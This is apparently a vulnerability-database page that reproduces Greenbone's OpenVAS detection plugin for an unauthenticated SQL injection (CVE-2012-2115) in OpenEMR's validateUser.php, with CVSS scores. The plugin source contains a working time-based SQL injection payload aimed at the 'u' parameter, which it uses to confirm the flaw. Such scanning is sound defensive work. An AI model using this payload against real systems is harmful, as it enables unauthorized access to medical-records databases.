Lucene search

K
openvasCopyright (C) 2015 Greenbone AGOPENVAS:1361412562310805345
HistoryMar 02, 2015 - 12:00 a.m.

OpenEMR 'validateUser.php' SQL Injection Vulnerability

2015-03-0200:00:00
Copyright (C) 2015 Greenbone AG
plugins.openvas.org
9

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.7

Confidence

Low

EPSS

0.005

Percentile

76.0%

OpenEMR is prone to an SQL injection (SQLi) vulnerability.

# SPDX-FileCopyrightText: 2015 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:open-emr:openemr";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.805345");
  script_version("2023-07-25T05:05:58+0000");
  script_cve_id("CVE-2012-2115");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"2023-07-25 05:05:58 +0000 (Tue, 25 Jul 2023)");
  script_tag(name:"creation_date", value:"2015-03-02 15:41:52 +0530 (Mon, 02 Mar 2015)");
  script_name("OpenEMR 'validateUser.php' SQL Injection Vulnerability");

  script_tag(name:"summary", value:"OpenEMR is prone to an SQL injection (SQLi) vulnerability.");

  script_tag(name:"vuldetect", value:"Send a crafted request via HTTP GET and
  check whether it is able to execute sql query or not.");

  script_tag(name:"insight", value:"Flaw is due to the validateUser.php script
  not properly sanitizing user-supplied input to the 'u' parameter.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote
  attackers to inject or manipulate SQL queries in the back-end database,
  allowing for the manipulation or disclosure of arbitrary data.");

  script_tag(name:"affected", value:"OpenEMR version 4.1.0 and possibly
  earlier.");

  script_tag(name:"solution", value:"Upgrade to version 4.1.1 or later.");

  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"qod_type", value:"remote_analysis");

  script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2012/Jan/27");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/51247");
  script_xref(name:"URL", value:"http://www.mavitunasecurity.com/sql-injection-vulnerability-in-openemr");

  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2015 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_openemr_detect.nasl");
  script_mandatory_keys("openemr/installed");
  script_require_ports("Services/www", 80);
  script_xref(name:"URL", value:"http://www.open-emr.org");
  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");

wait_extra_sec = 5;

if(!http_port = get_app_port(cpe:CPE)){
  exit(0);
}

if(!dir = get_app_location(cpe:CPE, port:http_port)){
  exit(0);
}

# Added three times, to make sure its working properly
sleep = make_list(5, 7, 9);

# Use sleep time to check we are able to execute command
foreach sec (sleep)
{
  url = dir + "/interface/login/validateUser.php?u='%2b(SELECT%201%20FROM%20"
            + "(SELECT%20SLEEP("+ sec +"))A)%2b'";

  sndReq = http_get(item:url, port:http_port);

  start = unixtime();
  rcvRes = http_keepalive_send_recv(port:http_port, data:sndReq);
  stop = unixtime();

  time_taken = stop - start;
  if(time_taken + 1 < sec || time_taken > (sec + wait_extra_sec)) exit(0);
}
security_message(http_port);
exit(0);

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.7

Confidence

Low

EPSS

0.005

Percentile

76.0%

Related for OPENVAS:1361412562310805345